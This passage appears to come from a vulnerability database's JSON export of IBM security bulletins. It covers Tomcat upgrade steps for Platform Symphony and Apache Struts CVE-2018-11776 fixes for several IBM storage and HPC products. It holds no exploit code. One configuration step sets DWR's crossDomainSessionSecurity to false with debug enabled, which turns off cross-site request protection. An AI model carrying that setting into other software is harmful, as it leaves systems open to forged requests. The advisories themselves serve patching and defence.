$EGO_TOP/gui/conf/catalina.properties $EGO_CONFDIR/../../gui/conf/catalina.properties \n> cp $EGO_TOP/gui/conf/server.xml $EGO_CONFDIR/../../gui/conf/server.xml\n\n 7. If you modified the _$EGO_CONFDIR/../../gui/conf/server.xml_ configuration file for details such as the GUI service port, manually redo those changes.\n\n 8. Edit the _web.xml_ files to add the following configuration:\n\n 1. Edit each of the following files: \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 2. Find the \u201c<servlet-name>dwr-invoker</servlet-name>\u201d line in the \u201c</servlet>\u201d section and add the following configuration: \n<init-param> \n<param-name>**crossDomainSessionSecurity**</param-name> \n<param-value>**false**</param-value> \n</init-param> \nFor example: \n<servlet> \n<servlet-name>dwr-invoker</servlet-name> \n<servlet-class>org.directwebremoting.servlet.DwrServlet</servlet-class> \n<init-param> \n<param-name>debug</param-name> \n<param-value>true</param-value> \n</init-param> \n**<init-param>** \n** <param-name>crossDomainSessionSecurity</param-name>** \n**<param-value>false</param-value>** \n** </init-param**> \n</servlet>\n\n 9. On each management host, delete all subdirectories and files in the _gui/work_ directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 10. On all client hosts, open your web browser and clear the browser cache.\n\n 11. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n 12. In the _$EGO_TOP/gui/logs/catalina.out_ file, check whether the GUI version indicates version 7.0.90: \nINFO: Server version: Apache Tomcat/7.0.90\n\n### **Uninstallation**\n\nFollow the instructions in this section to uninstall this update in your cluster, if required.\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -X Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. On each management host, restore the backup files: \n 1. Remove the Tomcat folder, which was introduced by this interim fix: \n> rm -rf $EGO_TOP/gui/1.2.8/tomcat\n\n 2. Restore the following folders and files from your backup: \n$EGO_TOP/gui/1.2.8/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 3. Delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 4. On all client hosts, open your web browser and clear the browser cache.\n\n 5. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n## _**For Platform Symphony 7.1 Fix Pack 1**_\n\n**Installation**\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. Log on to each management host in the cluster and back up the following files for recovery purposes: \n$EGO_TOP/gui/3.1/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml\n\n 3. Copy the _apache-tomcat-8.5.32.tar.gz_ package to a temporary folder and decompress the file: \n> cp apache-tomcat-8.5.32.tar.gz /tmp \n> tar zxvf apache-tomcat-8.5.32.tar.gz \n> rm -rf apache-tomcat-8.5.32/conf/ \n> rm -rf apache-tomcat-8.5.32/work/ \n> rm -rf apache-tomcat-8.5.32/logs/\n\n 4. Copy the Tomcat folder: \n> rm -rf $EGO_TOP/gui/3.1/tomcat \n> cp -rf apache-tomcat-8.5.32 $EGO_TOP/gui/3.1/tomcat\n\n 5. Copy the _sym7.1_lnx26-lib23-x64_build497568.tar.gz_ package and decompress it: \n> tar zxfo sym7.1_lnx26-lib23-x64_build497568.tar.gz -C $EGO_TOP\n\n 6. If you ran the \u201c**egoconfig mghost **_shared_dir_\u201d command during installation to set up a shared location for configuration files, ensure that the configuration file is changed in the shared directory: \n> cp $EGO_TOP/gui/conf/catalina.policy $EGO_CONFDIR/../../gui/conf/catalina.policy \n> cp $EGO_TOP/gui/conf/catalina.properties $EGO_CONFDIR/../../gui/conf/catalina.properties \n> cp $EGO_TOP/gui/conf/server.xml $EGO_CONFDIR/../../gui/conf/server.xml\n\n 7. If you modified the _$EGO_CONFDIR/../../gui/conf/server.xml_ configuration file for details such as the GUI service port, manually redo those changes.\n\n 8. Edit the _web.xml_ files to add the following configuration:\n\n 1. Edit each of the following files: \n$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml\n\n 2. Find the \u201c<servlet-name>dwr-invoker</servlet-name>\u201d line in the \u201c</servlet>\u201d section and add the following configuration: \n<init-param> \n<param-name>**crossDomainSessionSecurity**</param-name> \n<param-value>**false**</param-value> \n</init-param> \nFor example: \n<servlet> \n<servlet-name>dwr-invoker</servlet-name> \n<servlet-class>org.directwebremoting.servlet.DwrServlet</servlet-class> \n<init-param> \n<param-name>debug</param-name> \n<param-value>true</param-value> \n</init-param> \n**<init-param> \n<param-name>crossDomainSessionSecurity</param-name> \n<param-value>false</param-value> \n</init-para**m> \n</servlet>\n\n 9. On each management host, delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 10. On all client hosts, open your web browser and clear the browser cache.\n\n 11. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n 12. In the _$EGO_TOP/gui/logs/catalina.out_ file, check whether the GUI version indicates version 8.5.32: \nINFO: Server version: Apache Tomcat/8.5.32\n\n### **Uninstallation**\n\nFollow the instructions in this section to uninstall this update in your cluster, if required.\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. On each management host, restore the backup files:\n\n 1. Remove the Tomcat folder, which was introduced by this interim fix: \n> rm -rf $EGO_TOP/gui/3.1/tomcat\n\n 2. Restore the following folders and files from your backup: \n$EGO_TOP/gui/3.1/tomcat \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml\n\n 3. Delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 4. On all client hosts, open your web browser and clear the browser cache.\n\n 5. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T13:53:27", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Tomcat affects IBM Platform Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2021-09-01T13:53:27", "id": "48E2F14694E188398670F80EC3BDC38DA8366A97A8AABAF5E6501E5BCF31228E", "href": "https://www.ibm.com/support/pages/node/718917", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T18:17:25", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 & 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, & 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": "https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 & 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-01T18:12:50", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 